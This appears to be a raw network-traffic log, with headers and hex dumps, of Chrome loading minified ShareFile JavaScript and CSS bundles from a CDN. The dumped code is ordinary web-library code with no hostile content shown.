                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 167028
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2024 18:14:02 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:17 GMT
                                                                                                                                                                                                                      ETag: "d415917c44edb49d2128cf696d92474c"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 4cc2a0a7eb7d5483edc69be298297f9e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: NVj8-09ZRL2-6eg8XjFhV3ySCo9EintseCkniQ5G7OLTDWwaoLYzgw==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 72 75 62 69 63 6f 6e 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 73 3d 7b 7d 2c 61 3d 7b 7d 2c 75 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevrubiconpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},s={},a={},u={},c={};return
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC2180INData Raw: 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 22 3b 72 65 74 75 72 6e 20 6e 2e 73 70 6c 69 74 28 22 20 22 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 65 5b 6e 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 74 2e 70 75 73 68 28 65 5b 6e 5d 2b 22 3b 22 29 3a 72 2b 3d 6e 2b 22 20 22 7d 29 29 2c 72 7d 76 61 72 20 69 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 65 2e 6b 65 79 2b 22 2d 22 2b 74 2e 6e 61 6d 65 3b 21 31 3d 3d 3d 6e 26 26 65 2e 72 65 67 69 73 74 65 72 65 64 5b 72 5d 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 28 65 2e 72 65 67 69 73 74 65 72 65 64 5b 72 5d 3d 74 2e 73 74 79 6c 65 73 29 7d 2c 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 69 28 65 2c 74 2c 6e 29 3b 76 61 72 20 72 3d 65 2e 6b 65 79 2b 22 2d
                                                                                                                                                                                                                      Data Ascii: ,t,n){var r="";return n.split(" ").forEach((function(n){e[n]!==undefined?t.push(e[n]+";"):r+=n+" "})),r}var i=function(e,t,n){var r=e.key+"-"+t.name;!1===n&&e.registered[r]===undefined&&(e.registered[r]=t.styles)},o=function(e,t,n){i(e,t,n);var r=e.key+"-
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC16384INData Raw: 61 74 69 6f 6e 4b 65 79 2c 6f 29 29 72 65 74 75 72 6e 21 31 7d 72 65 74 75 72 6e 21 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 72 26 26 22 6c 6f 61 64 69 6e 67 22 3d 3d 3d 74 2e 73 74 61 74 65 2e 73 74 61 74 75 73 21 3d 3d 72 7c 7c 69 26 26 21 69 28 74 29 29 7d 66 75 6e 63 74 69 6f 6e 20 67 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 28 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 71 75 65 72 79 4b 65 79 48 61 73 68 46 6e 29 7c 7c 76 29 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 29 7b 72 65 74 75 72 6e 20 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 2c 28 28 65 2c 74 29 3d 3e 43 28 74 29 3f 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 29 2e 73 6f 72 74 28 29 2e 72 65 64 75 63 65 28 28 28 65 2c 6e 29 3d 3e 28 65 5b 6e 5d 3d 74 5b 6e 5d 2c
                                                                                                                                                                                                                      Data Ascii: ationKey,o))return!1}return!("boolean"==typeof r&&"loading"===t.state.status!==r||i&&!i(t))}function g(e,t){return((null==t?void 0:t.queryKeyHashFn)||v)(e)}function v(e){return JSON.stringify(e,((e,t)=>C(t)?Object.keys(t).sort().reduce(((e,n)=>(e[n]=t[n],
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC16384INData Raw: 6e 46 65 74 63 68 3a 65 3d 3e 7b 65 2e 66 65 74 63 68 46 6e 3d 28 29 3d 3e 7b 76 61 72 20 74 2c 6e 2c 72 2c 69 2c 6f 2c 73 3b 63 6f 6e 73 74 20 61 3d 6e 75 6c 6c 3d 3d 28 74 3d 65 2e 66 65 74 63 68 4f 70 74 69 6f 6e 73 29 7c 7c 6e 75 6c 6c 3d 3d 28 6e 3d 74 2e 6d 65 74 61 29 3f 76 6f 69 64 20 30 3a 6e 2e 72 65 66 65 74 63 68 50 61 67 65 2c 75 3d 6e 75 6c 6c 3d 3d 28 72 3d 65 2e 66 65 74 63 68 4f 70 74 69 6f 6e 73 29 7c 7c 6e 75 6c 6c 3d 3d 28 69 3d 72 2e 6d 65 74 61 29 3f 76 6f 69 64 20 30 3a 69 2e 66 65 74 63 68 4d 6f 72 65 2c 63 3d 6e 75 6c 6c 3d 3d 75 3f 76 6f 69 64 20 30 3a 75 2e 70 61 67 65 50 61 72 61 6d 2c 6c 3d 22 66 6f 72 77 61 72 64 22 3d 3d 3d 28 6e 75 6c 6c 3d 3d 75 3f 76 6f 69 64 20 30 3a 75 2e 64 69 72 65 63 74 69 6f 6e 29 2c 66 3d 22 62 61
                                                                                                                                                                                                                      Data Ascii: nFetch:e=>{e.fetchFn=()=>{var t,n,r,i,o,s;const a=null==(t=e.fetchOptions)||null==(n=t.meta)?void 0:n.refetchPage,u=null==(r=e.fetchOptions)||null==(i=r.meta)?void 0:i.fetchMore,c=null==u?void 0:u.pageParam,l="forward"===(null==u?void 0:u.direction),f="ba
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC13075INData Raw: 22 6f 70 74 69 6d 69 73 74 69 63 22 2c 61 2e 6f 6e 45 72 72 6f 72 26 26 28 61 2e 6f 6e 45 72 72 6f 72 3d 71 2e 62 61 74 63 68 43 61 6c 6c 73 28 61 2e 6f 6e 45 72 72 6f 72 29 29 2c 61 2e 6f 6e 53 75 63 63 65 73 73 26 26 28 61 2e 6f 6e 53 75 63 63 65 73 73 3d 71 2e 62 61 74 63 68 43 61 6c 6c 73 28 61 2e 6f 6e 53 75 63 63 65 73 73 29 29 2c 61 2e 6f 6e 53 65 74 74 6c 65 64 26 26 28 61 2e 6f 6e 53 65 74 74 6c 65 64 3d 71 2e 62 61 74 63 68 43 61 6c 6c 73 28 61 2e 6f 6e 53 65 74 74 6c 65 64 29 29 2c 61 2e 73 75 73 70 65 6e 73 65 26 26 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 61 2e 73 74 61 6c 65 54 69 6d 65 26 26 28 61 2e 73 74 61 6c 65 54 69 6d 65 3d 31 65 33 29 2c 28 61 2e 73 75 73 70 65 6e 73 65 7c 7c 61 2e 75 73 65 45 72 72 6f 72 42 6f 75 6e 64 61
                                                                                                                                                                                                                      Data Ascii: "optimistic",a.onError&&(a.onError=q.batchCalls(a.onError)),a.onSuccess&&(a.onSuccess=q.batchCalls(a.onSuccess)),a.onSettled&&(a.onSettled=q.batchCalls(a.onSettled)),a.suspense&&"number"!=typeof a.staleTime&&(a.staleTime=1e3),(a.suspense||a.useErrorBounda
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC16384INData Raw: 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 28 74 3d 74 7c 7c 7b 7d 29 2e 75 72 6c 3d 65 3a 74 3d 65 7c 7c 7b 7d 2c 28 74 3d 61 28 74 68 69 73 2e 64 65 66 61 75 6c 74 73 2c 74 29 29 2e 6d 65 74 68 6f 64 3f 74 2e 6d 65 74 68 6f 64 3d 74 2e 6d 65 74 68 6f 64 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3a 74 68 69 73 2e 64 65 66 61 75 6c 74 73 2e 6d 65 74 68 6f 64 3f 74 2e 6d 65 74 68 6f 64 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 73 2e 6d 65 74 68 6f 64 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3a 74 2e 6d 65 74 68 6f 64 3d 22 67 65 74 22 3b 76 61 72 20 6e 3d 74 2e 74 72 61 6e 73 69 74 69 6f 6e 61 6c 3b 6e 21 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 63 2e 61 73 73 65 72 74 4f 70 74 69 6f 6e 73 28 6e 2c 7b 73 69 6c 65 6e 74 4a 53 4f 4e 50 61 72 73 69 6e 67 3a 6c 2e 74
                                                                                                                                                                                                                      Data Ascii: g"==typeof e?(t=t||{}).url=e:t=e||{},(t=a(this.defaults,t)).method?t.method=t.method.toLowerCase():this.defaults.method?t.method=this.defaults.method.toLowerCase():t.method="get";var n=t.transitional;n!==undefined&&c.assertOptions(n,{silentJSONParsing:l.t
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC16384INData Raw: 6f 7d 29 3b 76 61 72 20 72 3d 6e 28 32 34 34 35 29 2c 69 3d 6e 28 34 38 37 36 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 76 61 72 20 74 3d 65 2e 6c 6f 61 64 69 6e 67 2c 6e 3d 65 2e 73 74 79 6c 65 2c 6f 3d 65 2e 63 68 69 6c 64 72 65 6e 3b 72 65 74 75 72 6e 28 30 2c 72 2e 59 29 28 69 2e 53 70 69 6e 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 73 74 79 6c 65 3a 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 7d 2c 6e 29 2c 73 70 69 6e 6e 69 6e 67 3a 74 7d 2c 7b 63 68 69 6c 64 72 65 6e 3a 6f 7d 29 2c 76 6f 69 64 20 30 29 7d 7d 2c 37 36 31 38 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73
                                                                                                                                                                                                                      Data Ascii: o});var r=n(2445),i=n(4876);function o(e){var t=e.loading,n=e.style,o=e.children;return(0,r.Y)(i.Spin,Object.assign({style:Object.assign({display:"flex",alignItems:"center",justifyContent:"center"},n),spinning:t},{children:o}),void 0)}},7618:(e,t,n)=>{"us
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC16384INData Raw: 28 65 2c 22 64 75 70 6c 69 63 61 74 65 64 20 6d 61 70 70 69 6e 67 20 6b 65 79 22 29 29 2c 22 5f 5f 70 72 6f 74 6f 5f 5f 22 3d 3d 3d 69 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 69 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 6f 7d 29 3a 74 5b 69 5d 3d 6f 2c 64 65 6c 65 74 65 20 6e 5b 69 5d 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 43 65 28 65 29 7b 76 61 72 20 74 3b 31 30 3d 3d 3d 28 74 3d 65 2e 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 65 2e 70 6f 73 69 74 69 6f 6e 29 29 3f 65 2e 70 6f 73 69 74 69 6f 6e 2b 2b 3a 31 33 3d 3d 3d 74 3f 28 65 2e 70 6f 73 69 74 69 6f 6e 2b 2b 2c 31 30 3d 3d 3d 65 2e
                                                                                                                                                                                                                      Data Ascii: (e,"duplicated mapping key")),"__proto__"===i?Object.defineProperty(t,i,{configurable:!0,enumerable:!0,writable:!0,value:o}):t[i]=o,delete n[i];return t}function Ce(e){var t;10===(t=e.input.charCodeAt(e.position))?e.position++:13===t?(e.position++,10===e.
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC2256INData Raw: 31 30 32 34 2a 28 72 2d 35 35 32 39 36 29 2b 6e 2d 35 36 33 32 30 2b 36 35 35 33 36 3a 72 7d 66 75 6e 63 74 69 6f 6e 20 78 74 28 65 29 7b 72 65 74 75 72 6e 2f 5e 5c 6e 2a 20 2f 2e 74 65 73 74 28 65 29 7d 76 61 72 20 4f 74 3d 31 2c 43 74 3d 32 2c 45 74 3d 33 2c 41 74 3d 34 2c 6b 74 3d 35 3b 66 75 6e 63 74 69 6f 6e 20 52 74 28 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 2c 73 2c 61 29 7b 76 61 72 20 75 2c 63 2c 6c 3d 30 2c 66 3d 6e 75 6c 6c 2c 68 3d 21 31 2c 70 3d 21 31 2c 64 3d 2d 31 21 3d 3d 72 2c 79 3d 2d 31 2c 6d 3d 76 74 28 63 3d 53 74 28 65 2c 30 29 29 26 26 63 21 3d 3d 4e 65 26 26 21 67 74 28 63 29 26 26 63 21 3d 3d 56 65 26 26 63 21 3d 3d 65 74 26 26 63 21 3d 3d 4a 65 26 26 63 21 3d 3d 57 65 26 26 63 21 3d 3d 6e 74 26 26 63 21 3d 3d 72 74 26 26 63 21 3d 3d 6f
                                                                                                                                                                                                                      Data Ascii: 1024*(r-55296)+n-56320+65536:r}function xt(e){return/^\n* /.test(e)}var Ot=1,Ct=2,Et=3,At=4,kt=5;function Rt(e,t,n,r,i,o,s,a){var u,c,l=0,f=null,h=!1,p=!1,d=-1!==r,y=-1,m=vt(c=St(e,0))&&c!==Ne&&!gt(c)&&c!==Ve&&c!==et&&c!==Je&&c!==We&&c!==nt&&c!==rt&&c!==o
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC14128INData Raw: 2b 65 2e 73 6c 69 63 65 28 6f 2c 72 29 2c 6f 3d 72 2b 31 29 2c 73 3d 61 3b 72 65 74 75 72 6e 20 75 2b 3d 22 5c 6e 22 2c 65 2e 6c 65 6e 67 74 68 2d 6f 3e 74 26 26 73 3e 6f 3f 75 2b 3d 65 2e 73 6c 69 63 65 28 6f 2c 73 29 2b 22 5c 6e 22 2b 65 2e 73 6c 69 63 65 28 73 2b 31 29 3a 75 2b 3d 65 2e 73 6c 69 63 65 28 6f 29 2c 75 2e 73 6c 69 63 65 28 31 29 7d 66 75 6e 63 74 69 6f 6e 20 49 74 28 65 2c 74 2c 6e 2c 72 29 7b 76 61 72 20 69 2c 6f 2c 73 2c 61 3d 22 22 2c 75 3d 65 2e 74 61 67 3b 66 6f 72 28 69 3d 30 2c 6f 3d 6e 2e 6c 65 6e 67 74 68 3b 69 3c 6f 3b 69 2b 3d 31 29 73 3d 6e 5b 69 5d 2c 65 2e 72 65 70 6c 61 63 65 72 26 26 28 73 3d 65 2e 72 65 70 6c 61 63 65 72 2e 63 61 6c 6c 28 6e 2c 53 74 72 69 6e 67 28 69 29 2c 73 29 29 2c 28 4d 74 28 65 2c 74 2b 31 2c 73 2c
                                                                                                                                                                                                                      Data Ascii: +e.slice(o,r),o=r+1),s=a;return u+="\n",e.length-o>t&&s>o?u+=e.slice(o,s)+"\n"+e.slice(s+1):u+=e.slice(o),u.slice(1)}function It(e,t,n,r){var i,o,s,a="",u=e.tag;for(i=0,o=n.length;i<o;i+=1)s=n[i],e.replacer&&(s=e.replacer.call(n,String(i),s)),(Mt(e,t+1,s,


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      87192.168.2.174980813.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC578OUTGET /sharefile-web/sharefiledev-user-act-hist-pilet/1.7.0/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 08:14:18 GMT
                                                                                                                                                                                                                      Last-Modified: Thu, 19 Sep 2024 10:07:36 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 23776effa8a63b2e2dccd702e73b0c86.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: KDYA5GQpEQMWAENoOWKVoX5xUTBaU94rDrPqimTiYLrRY7CuS8BLLQ==
                                                                                                                                                                                                                      Age: 40919
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      88192.168.2.174980713.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC424OUTGET /sharefile-web/sharefiledev-user-act-hist-pilet/1.7.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC521INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 91744
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Thu, 19 Sep 2024 10:07:36 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:16 GMT
                                                                                                                                                                                                                      ETag: "ec10a08abeea396244c7c88ffaa5ecf7"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 42b60ee17f7593fff72ca1cb725d6c9a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: cXAtGM39Y-dudOEl2n7UZN6AD6m4pBi9oJPTyAKA4vYOtpKOrzkz2w==
                                                                                                                                                                                                                      Age: 2
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC15863INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 75 73 65 72 61 63 74 68 69 73 74 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6e 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 2e 41 6c 65 72 74 3d 65 2e 41 6c 65 72 74 2c 72 2e 42 75 74 74 6f 6e
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevuseracthistpilet,{})System.register(["antd","react","react-dom","tslib"],(function(e,t){var r={},n={},o={},i={};return Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){r.Alert=e.Alert,r.Button
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC16384INData Raw: 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6e 61 76 69 67 61 74 6f 72 26 26 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 63 6c 75 64 65 73 28 65 29 7d 2c 65 7d 28 29 3b 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 76 61 72 20 74 3d 6e 65 77 20 69 28 65 29 2c 72 3d 74 2e 73 65 67 6d 65 6e 74 28 29 3b 72 65 74 75 72 6e 20 72 2e 6c 65 6e 67 74 68 3c 32 3f 65 3a 74 2e 70 61 74 68 6e 61 6d 65 28 22 22 29 2e 71 75 65 72 79 28 22 22 29 2e 68 61 73 68 28 22 22 29 2e 73 65 67 6d 65 6e 74 28 72 2e 73 6c 69 63 65 28 30 2c 32 29 29 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 2f 22 7d 7d 2c 37 31 39 32 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20
                                                                                                                                                                                                                      Data Ascii: undefined"!=typeof navigator&&navigator.userAgent.toLowerCase().includes(e)},e}();function P(e){var t=new i(e),r=t.segment();return r.length<2?e:t.pathname("").query("").hash("").segment(r.slice(0,2)).toString()+"/"}},7192:(e,t,r)=>{"use strict";function
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC16384INData Raw: 76 6f 69 64 20 30 3a 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 5b 72 5d 29 3a 6f 28 65 5b 72 5d 2c 74 5b 72 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 69 66 28 21 6e 2e 69 73 55 6e 64 65 66 69 6e 65 64 28 74 5b 65 5d 29 29 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 74 5b 65 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 72 29 7b 72 65 74 75 72 6e 20 6e 2e 69 73 55 6e 64 65 66 69 6e 65 64 28 74 5b 72 5d 29 3f 6e 2e 69 73 55 6e 64 65 66 69 6e 65 64 28 65 5b 72 5d 29 3f 76 6f 69 64 20 30 3a 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 5b 72 5d 29 3a 6f 28 75 6e 64 65 66 69 6e 65 64 2c 74 5b 72 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 72 29 7b 72 65 74 75 72 6e 20 72 20 69 6e 20 74 3f 6f 28 65 5b 72 5d 2c 74 5b 72 5d 29 3a 72 20 69 6e 20 65 3f 6f 28
                                                                                                                                                                                                                      Data Ascii: void 0:o(undefined,e[r]):o(e[r],t[r])}function s(e){if(!n.isUndefined(t[e]))return o(undefined,t[e])}function a(r){return n.isUndefined(t[r])?n.isUndefined(e[r])?void 0:o(undefined,e[r]):o(undefined,t[r])}function u(r){return r in t?o(e[r],t[r]):r in e?o(
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC16384INData Raw: 72 65 73 73 65 20 22 2c 6d 6e 3a 22 20 65 64 75 20 67 6f 76 20 6f 72 67 20 22 2c 6d 6f 3a 22 20 63 6f 6d 20 65 64 75 20 67 6f 76 20 6e 65 74 20 6f 72 67 20 22 2c 6d 74 3a 22 20 63 6f 6d 20 65 64 75 20 67 6f 76 20 6e 65 74 20 6f 72 67 20 22 2c 6d 76 3a 22 20 61 65 72 6f 20 62 69 7a 20 63 6f 6d 20 63 6f 6f 70 20 65 64 75 20 67 6f 76 20 69 6e 66 6f 20 69 6e 74 20 6d 69 6c 20 6d 75 73 65 75 6d 20 6e 61 6d 65 20 6e 65 74 20 6f 72 67 20 70 72 6f 20 22 2c 6d 77 3a 22 20 61 63 20 63 6f 20 63 6f 6d 20 63 6f 6f 70 20 65 64 75 20 67 6f 76 20 69 6e 74 20 6d 75 73 65 75 6d 20 6e 65 74 20 6f 72 67 20 22 2c 6d 78 3a 22 20 63 6f 6d 20 65 64 75 20 67 6f 62 20 6e 65 74 20 6f 72 67 20 22 2c 6d 79 3a 22 20 63 6f 6d 20 65 64 75 20 67 6f 76 20 6d 69 6c 20 6e 61 6d 65 20 6e 65
                                                                                                                                                                                                                      Data Ascii: resse ",mn:" edu gov org ",mo:" com edu gov net org ",mt:" com edu gov net org ",mv:" aero biz com coop edu gov info int mil museum name net org pro ",mw:" ac co com coop edu gov int museum net org ",mx:" com edu gob net org ",my:" com edu gov mil name ne
